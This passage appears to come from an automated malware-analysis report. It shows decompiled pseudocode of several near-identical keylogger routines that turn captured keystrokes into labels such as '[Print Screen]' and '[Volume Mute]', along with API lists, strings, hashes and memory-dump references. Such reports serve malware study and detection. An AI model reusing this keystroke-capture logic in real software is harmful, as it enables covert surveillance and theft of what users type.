					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x1000768c
0x1000768c
0x10007693
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[Scrol Lock], xrefs: 1000768E
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Scrol Lock]
API String ID: 783433895-3106752957
Opcode ID: 7d739420cde52f5cdf23b0552a77265f6848328848d1a0f3863d68950f1cd5c9
Instruction ID: 538bcb97e9cdfd1a49afb72e3ad707114e7046f27a94ba55a28649c3e7b83c1d
Opcode Fuzzy Hash: 7d739420cde52f5cdf23b0552a77265f6848328848d1a0f3863d68950f1cd5c9
Instruction Fuzzy Hash: 7031C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000769A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000769A(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Sleep]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x1000769a
0x1000769a
0x100076a1
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[Sleep], xrefs: 1000769C
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Sleep]
API String ID: 783433895-3656392610
Opcode ID: 4f42286bcb9d2d57705b4f68fa1ae7d45a5f494e57315e7dc3e0b652194aa4b2
Instruction ID: 0f1bd7a52d7bab131bf13330daa87dc6c7aebe1a4c65384e0524c1501f8f18d4
Opcode Fuzzy Hash: 4f42286bcb9d2d57705b4f68fa1ae7d45a5f494e57315e7dc3e0b652194aa4b2
Instruction Fuzzy Hash: A031C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 100076A8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100076A8(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Print Screen]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100076a8
0x100076a8
0x100076af
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[Print Screen], xrefs: 100076AA
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Print Screen]
API String ID: 783433895-3743399299
Opcode ID: 1ddbb06d12cae7f61712b76396317ea06106a7346feb82e8f9531a385193e155
Instruction ID: ab27b4f068ad1f5cf43c9d8905a98d245769d77d18c34ebd10b41bde0b20419d
Opcode Fuzzy Hash: 1ddbb06d12cae7f61712b76396317ea06106a7346feb82e8f9531a385193e155
Instruction Fuzzy Hash: 8231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489724ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100076B6, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100076B6(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Arrow Up]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100076b6
0x100076b6
0x100076bd
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Arrow Up], xrefs: 100076B8

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Arrow Up]
API String ID: 783433895-3327686714
Opcode ID: 83203669f0511a29086e5a836e6f4c0065e3a22eefa3cde518e48db2ad99b6a3
Instruction ID: b80a0d9e46f3fa67cf2931779c914642823d7e923a8a23d77be412dba9eacf16
Opcode Fuzzy Hash: 83203669f0511a29086e5a836e6f4c0065e3a22eefa3cde518e48db2ad99b6a3
Instruction Fuzzy Hash: 8631C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100076C4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100076C4(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Volume Down]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100076c4
0x100076c4
0x100076cb
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Volume Down], xrefs: 100076C6

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Volume Down]
API String ID: 783433895-1488893751
Opcode ID: 304b93c83e960425b2644ed9c30a8069e95f38cdf27668f700968b4d8be163ed
Instruction ID: 36b4c4fc11892ac8fc2660bbf295ac53e9d52ac89c47b39cb3f3571394c4b765
Opcode Fuzzy Hash: 304b93c83e960425b2644ed9c30a8069e95f38cdf27668f700968b4d8be163ed
Instruction Fuzzy Hash: 4D31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489724ECAB8EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100076D2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100076D2(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Volume Mute]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100076d2
0x100076d2
0x100076d9
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

